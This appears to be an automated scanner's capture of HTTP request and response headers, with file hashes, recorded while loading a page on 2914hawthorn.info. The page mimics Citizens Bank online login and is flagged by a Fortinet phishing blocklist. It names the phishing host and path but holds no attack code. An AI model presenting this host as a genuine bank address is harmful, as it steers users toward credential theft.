cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: DE
access-control-allow-origin: *
cache-control: public, max-age=31919000
etag: W/"ce6e785579ae4cb555c9de311d1b9271"
last-modified: Mon, 25 Jan 2021 22:04:05 GMT
cdn-cachedat: 08/20/2022 03:07:07
cdn-proxyver: 1.02
cdn-requestpullcode: 200
cdn-requestpullsuccess: True
cdn-edgestorageid: 601
cdn-status: 200
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
cdn-requestid: b3527bb7d9c464f2632ca9c5cd32e888
cdn-cache: HIT
cf-cache-status: HIT
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 753028d8ed5c1c12-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (50395)
Size:   32898
Md5:    02e6702e54c34fb92a5a4bbe63a0733a
Sha1:   f42273b276b172673d221ce7b7594fc961296cc4
Sha256: 040270fc742cfffc4592bcc9fcf109fe0a3625cde6645a63d84dc114545be8e8
                                        
                                            GET /t-Kmcy8k/uJqt11r/GPaw2Rw/Wd/5cz5rDSm/fQEkCFEB/BwwGXU/UME20 HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   315
Md5:    a34ac19f4afae63adc5d2f7bc970c07f
Sha1:   a82190fc530c265aa40a045c21770d967f4767b8
Sha256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /_sec/cp_challenge/sec-3-6.css HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   315
Md5:    a34ac19f4afae63adc5d2f7bc970c07f
Sha1:   a82190fc530c265aa40a045c21770d967f4767b8
Sha256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.18.32.68
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 30 Sep 2022 21:47:53 GMT
Content-Length: 471
Connection: keep-alive
Last-Modified: Fri, 30 Sep 2022 16:31:54 GMT
Expires: Fri, 07 Oct 2022 16:31:53 GMT
Etag: "c7f64f4b02d9243a32a90f2110a79899af46b885"
Cache-Control: max-age=585239,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb5
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 753028dcf8cf1c16-OSL

                                        
                                            GET /_sec/cp_challenge/sec-cpt-3-6.js HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   315
Md5:    a34ac19f4afae63adc5d2f7bc970c07f
Sha1:   a82190fc530c265aa40a045c21770d967f4767b8
Sha256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /efs/efs/jsp-ns/scripts/common.js HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   315
Md5:    a34ac19f4afae63adc5d2f7bc970c07f
Sha1:   a82190fc530c265aa40a045c21770d967f4767b8
Sha256: d5a89e26beae0bc03ad18a0b0d1d3d75f87c32047879d25da11970cb5c4662a3

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /resources/onsite/js/cool-2.1.15.min.js HTTP/1.1 
Host: nebula-cdn.kampyle.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         151.101.85.175
HTTP/2 200 OK
content-type: application/javascript
                                        
x-amz-id-2: 5DsDii/Q4DH7ELXaSSQk8LthmRPPyf53c8AfqU+DuRMLCwyO0c2GhS45Jvn2u1AAXM+COlEdWaw=
x-amz-request-id: N94HBZ7MFH62Q62Y
last-modified: Sun, 24 Jan 2021 11:03:10 GMT
etag: "80dd5e3be5152c5c72d552c6a26ef6ff"
x-amz-version-id: 9HCXbKZTbCJZkS8s9IuB.pE0JEvI0TGW
server: AmazonS3
access-control-allow-origin: *
cache-control: max-age=2592000
content-encoding: gzip
accept-ranges: bytes
date: Fri, 30 Sep 2022 21:47:54 GMT
via: 1.1 varnish
age: 400960
x-served-by: cache-bma1625-BMA
x-cache: HIT
x-cache-hits: 1
x-timer: S1664574474.103146,VS0,VE1
vary: Accept-Encoding
strict-transport-security: max-age=31557600
content-length: 5197
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  C source, ASCII text, with very long lines (585)
Size:   5197
Md5:    a8a8316559534b9784a92826ab49b9f2
Sha1:   3836a3dbc421106117da4a97871aed09eedbdf0c
Sha256: b11175156d2ff85a9f749c78ab961597cc0034db4df0295f2e57335e94f61b1e
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4346
Cache-Control: 'max-age=158059'
Date: Fri, 30 Sep 2022 21:47:54 GMT
Last-Modified: Fri, 30 Sep 2022 20:35:28 GMT
Server: ECS (ska/F6FD)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /citi/citizensbankonline.com_deathshortencode/W/img/loading.gif HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Fri, 30 Sep 2022 21:47:52 GMT
Server: Apache
Last-Modified: Sat, 11 Aug 2018 17:03:52 GMT
Accept-Ranges: bytes
Content-Length: 38636
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 200 x 200\012- data
Size:   38636
Md5:    d10ef01e81faa2c2d812bdf670b4e072
Sha1:   77d09a57b2091fd7665dff763a5eab23e0ff907e
Sha256: 5e3d5246b17e19e65385092db07554d8e1c5c4a226a6d7f97824b8e1e8571e34
                                        
                                            GET /dest5.html?d_nsid=0 HTTP/1.1 
Host: citizensbank.demdex.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         54.76.210.146
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
                                        
Accept-Ranges: bytes
Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
content-encoding: gzip
date: Fri, 30 Sep 2022 21:47:54 GMT
DCS: dcs-prod-irl1-1-v044-0460362a2.edge-irl1.demdex.com 0 ms
Expires: Thu, 01 Jan 1970 00:00:00 UTC
last-modified: Thu, 29 Sep 2022 16:18:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains
vary: accept-encoding
X-TID: /jDIeMWkTK4=
transfer-encoding: chunked
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (550)
Size:   2791
Md5:    ccbdcb1e84c241950763ec4cd516cdfc
Sha1:   55dfa8d4b09c5c3a80fcd101152f6ebed3d27a2c
Sha256: de9ccb9b168945a24f20edc28c39be4135b328129ba8ee378401a7aedc925d12
                                        
                                            POST / HTTP/1.1 
Host: ocsps.ssl.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         34.237.184.165
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Date: Fri, 30 Sep 2022 21:47:54 GMT
Content-Length: 1883
Connection: keep-alive
Expires: Fri, 07 Oct 2022 15:29:58 GMT
Cache-Control: max-age=86400,public,no-transform,must-revalidate
ETag: "735ab3c4f753d36cc49abba139d921fb28569a3d"
Last-Modified: Fri, 30 Sep 2022 15:29:59 GMT
X-Proxy-Cache: HIT


--- Additional Info ---
Magic:  data
Size:   1883
Md5:    00675c0d3413eacf3d31a7a5a5bc2228
Sha1:   735ab3c4f753d36cc49abba139d921fb28569a3d
Sha256: 88b4f1c8f637b96bc4973c99ac7e53450410391d03ba0d146f2370f61992611b
                                        
                                            GET /egw/5/qceuv8449dzg58ptt1bhda9g8ue19c7s/track/__cool.gif?data=eyJldmVudHMiOiBbCiAgICB7InNlc3Npb25fc2NyZWVuX3NpemUiOiAiMTI4MHgxMDI0Iiwic2Vzc2lvbl9kdWEiOiAiTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0OyBydjo5Ni4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzk2LjAiLCJzZXNzaW9uX3BsYXRmb3JtIjogIkxpbnV4IHg4Nl82NCIsInRyYWNrZXJfdHlwZSI6ICJqYXZhc2NyaXB0IiwidHJhY2tlcl92ZXJzaW9uIjogIjIuMS4xNSIsImV2ZW50X25hbWUiOiAibmVidWxhX3BhZ2VfdmlldyIsImV2ZW50X3RpbWVzdGFtcF9lcG9jaCI6ICIxNjY0NTc0NDcwODIwIiwiZXZlbnRfdGltZXpvbmVfb2Zmc2V0IjogMCwidXNlcl9pZCI6ICIxODM5MDVlYmFhMjlmLTBhMzIyYmU0OTk3YWZjOC0zMDZkNDY0YS0xNDAwMDAtMTgzOTA1ZWJhYTM0MmMiLCJlbnZpcm9tZW50IjogInByb2RVc09yZWdvbiIsImFjY291bnRJZCI6IDM1Njg2MCwidXJsIjogImh0dHBzOi8vMjkxNGhhd3Rob3JuLmluZm8vY2l0aS9jaXRpemVuc2JhbmtvbmxpbmUuY29tX2RlYXRoc2hvcnRlbmNvZGUvVy8iLCJ3ZWJzaXRlSWQiOiAzNTY4NjEsImZvcm1JZCI6IG51bGwsImZvcm1UcmlnZ2VyVHlwZSI6IG51bGwsImthbXB5bGVfZGF0YSI6IHsiTEFTVF9JTlZJVEFUSU9OX1ZJRVciOiAiIiwiREVDTElORURfREFURSI6ICIiLCJrYW1weWxlSW52aXRlUHJlc2VudGVkIjogIiIsImthbXB5bGVfdXNlcmlkIjogIjM1OTMtNjQyZi1hODNkLWI5ZTEtM2FiNS00MzBjLWJjNGYtNDcwZSIsImthbXB5bGVVc2VyU2Vzc2lvbiI6ICIxNjY0NTc0NDcwODA1Iiwia2FtcHlsZVVzZXJQZXJjZW50aWxlIjogIiIsIlNVQk1JVFRFRF9EQVRFIjogIiJ9LCJjb29raWVfc2l6ZSI6IDI1NCwia2FtcHlsZV92ZXJzaW9uIjogIjIuMzkuMCIsIm9uc2l0ZV92ZXJzaW9uIjogIjIuMzkuMCIsImhpc3RvcnlfbGVuZ3RoIjogMSwiZXZlbnRfbG9jYWxfdGltZXN0YW1wIjogMTY2NDU3NDQ3MDgwNywicG9zaXRpb24iOiBudWxsLCJpc1VzZXJJZGVudGlmaWVkIjogZmFsc2UsImZlZWRiYWNrX2NvcnJlbGF0aW9uX3V1aWQiOiBudWxsfQpdfQ== HTTP/1.1 
Host: udc-neb.kampyle.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         35.241.45.82
HTTP/2 200 OK
content-type: image/gif; charset=UTF-8
                                        
date: Fri, 30 Sep 2022 21:47:54 GMT
access-control-allow-credentials: true
access-control-allow-origin: *
access-control-allow-methods: GET, POST, PUT, DELETE
access-control-allow-headers: X-Requested-With, Origin, Content-Type, Accept
access-control-max-age: 1800
x-me: prod-instance-gatewayservice-blue-gczz
x-application-context: application:9090
content-length: 0
server: Jetty(9.2.11.v20150529)
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2

                                        
                                            GET /efs/hhf/css/citizensns.min.44745.css HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 404 Not Found
content-type: text/html
                                        
x-frame-options: SAMEORIGIN
last-modified: Tue, 20 Apr 2021 15:35:21 GMT
etag: "26ce-5c06931abe040"
accept-ranges: bytes
content-length: 9934
x-olb-req-received: t=1664574474411819
x-olb-req-duration: D=175
access-control-allow-origin: *
cache-control: max-age=896
expires: Fri, 30 Sep 2022 22:02:50 GMT
date: Fri, 30 Sep 2022 21:47:54 GMT
server-timing: cdn-cache; desc=MISS, edge; dur=577, origin; dur=393
strict-transport-security: max-age=15768000
lb-action: None, None
set-cookie: ak_bmsc=060EB06D026150DB57019509DE3AA11B~000000000000000000000000000000~YAAQnE8kF3Or9FiDAQAASclekBFLZZvNfgpFWbP31yuGuyr5zA1YtcNqofWkB/YskpcGjude5a48aEVhN+O7HRzCSQGXZMdn4Ee9dd2wAsiqCD4PNjcIux/fJglrW8QOkp+PhIcYzpV2DMzY6HwImJPizIHSuccX+Y6WM2LlmBpk+oxZh2kdgBNj5jtwIj11iiS8ZYqcYTzi3pfcsymr0pJW7zxuOZGbDGGnbXhNrO32acZqadS46DXmO3NE2JH4kUq6mKO/5PpmBAPj3i2+0XTc6g2Y+pTtEG55ekS3GUhGhPG1ADGsK5+z0cPyWzjKrOIl+cL/6ENplIRHjkY8Lh+aOtoSpzhv4ZAo9O3l4jD3G87eSUUEZuPcM9SL6vdfdd9RnoQM5P+SqvKrXTmpuHm2V0Wb; Domain=.citizensbankonline.com; Path=/; Expires=Fri, 30 Sep 2022 23:47:53 GMT; Max-Age=7199; HttpOnly
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   9934
Md5:    7a50763a326038e01ff7f9624d28066c
Sha1:   cae9d82811966f159a734f9402ace74eb01f17f8
Sha256: c6cc63926f47095f4caf94ad78258d77933e3adcc1ce7781bd7cb2a97d596411
                                        
                                            GET /efs/efs/web-ui/img/mobile-desktop-icons/icon-hires.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Tue, 13 Sep 2022 02:22:48 GMT
etag: "3653-5e885b03510a1"
accept-ranges: bytes
content-length: 13907
x-olb-req-received: t=1664242473344926
x-olb-req-duration: D=143
access-control-allow-origin: *
cache-control: max-age=272860
expires: Tue, 04 Oct 2022 01:35:34 GMT
date: Fri, 30 Sep 2022 21:47:54 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced\012- data
Size:   13907
Md5:    172ee65ce7e2afc164fb89579d8060b2
Sha1:   1bcc0c40ce0dd35f4150e286d4da86eb5150d2da
Sha256: 6031e1710c50b5ade8d4fe1f9d2a7885caa5f18493944871891d9bf847dcec0e
                                        
                                            GET /efs/efs/web-ui/img/mobile-desktop-icons/icon-normal.png HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: image/png
                                        
x-frame-options: SAMEORIGIN
last-modified: Tue, 13 Sep 2022 02:22:48 GMT
etag: "2a77-5e885b03510a1"
accept-ranges: bytes
content-length: 10871
x-olb-req-received: t=1664242473036936
x-olb-req-duration: D=155
access-control-allow-origin: *
cache-control: max-age=272861
expires: Tue, 04 Oct 2022 01:35:35 GMT
date: Fri, 30 Sep 2022 21:47:54 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced\012- data
Size:   10871
Md5:    f62b2664dd6a40ab3a9f7af34412f8b7
Sha1:   02438189257c795c3726e4f45b1ce3bb921255d5
Sha256: 707a3217546ca6852234cb3fa3b61f458581ca943b6195032ba9efe7e1e0ee5f
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C17A343CEB786A421F8C3ABFFFAE350E12C92271A69FC88EB8E8BAB568877D6B"
Last-Modified: Fri, 30 Sep 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5257
Expires: Fri, 30 Sep 2022 23:15:31 GMT
Date: Fri, 30 Sep 2022 21:47:54 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C17A343CEB786A421F8C3ABFFFAE350E12C92271A69FC88EB8E8BAB568877D6B"
Last-Modified: Fri, 30 Sep 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5257
Expires: Fri, 30 Sep 2022 23:15:31 GMT
Date: Fri, 30 Sep 2022 21:47:54 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C17A343CEB786A421F8C3ABFFFAE350E12C92271A69FC88EB8E8BAB568877D6B"
Last-Modified: Fri, 30 Sep 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5257
Expires: Fri, 30 Sep 2022 23:15:31 GMT
Date: Fri, 30 Sep 2022 21:47:54 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C17A343CEB786A421F8C3ABFFFAE350E12C92271A69FC88EB8E8BAB568877D6B"
Last-Modified: Fri, 30 Sep 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5257
Expires: Fri, 30 Sep 2022 23:15:31 GMT
Date: Fri, 30 Sep 2022 21:47:54 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C17A343CEB786A421F8C3ABFFFAE350E12C92271A69FC88EB8E8BAB568877D6B"
Last-Modified: Fri, 30 Sep 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5257
Expires: Fri, 30 Sep 2022 23:15:31 GMT
Date: Fri, 30 Sep 2022 21:47:54 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb2016911-a1a6-4bdf-a8f3-89e94a0aaff7.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7810
x-amzn-requestid: 7f6d92e1-c7b1-4dd2-9efa-52ad324ca19d
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZMK6pFvkoAMF_yA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6334beaa-362b7368566955966db78385;Sampled=0
x-amzn-remapped-date: Wed, 28 Sep 2022 21:37:46 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: TbPFEVDpMOjK26iu1UGcx56vtP7Pywq05VAylNubOIfbMgo1qGsA-w==
via: 1.1 f13aef0c4b52f6f681401f232d03eb68.cloudfront.net (CloudFront), 1.1 7eb3b782ab09047ce0d11ee03763894c.cloudfront.net (CloudFront), 1.1 google
date: Thu, 29 Sep 2022 23:45:42 GMT
age: 79332
etag: "31b8538deb0f00d5b4182739a4a2fcc1b956a998"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7810
Md5:    456968f691ae9464d69a37bffe9bd7ce
Sha1:   31b8538deb0f00d5b4182739a4a2fcc1b956a998
Sha256: 5cde1e3158e6c6c0b7a01d3bd32f2aa292b3b205f604e5c4ed71cafedad06bf2
                                        
                                            GET /le_secure_storage/3.13.1.0-release_5043/storage.secure.min.js?loc=https%3A%2F%2Fwww3.citizensbankonline.com&site=83789770&force=1&env=prod&isCrossDomain=true HTTP/1.1 
Host: lpcdn.lpsnmedia.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
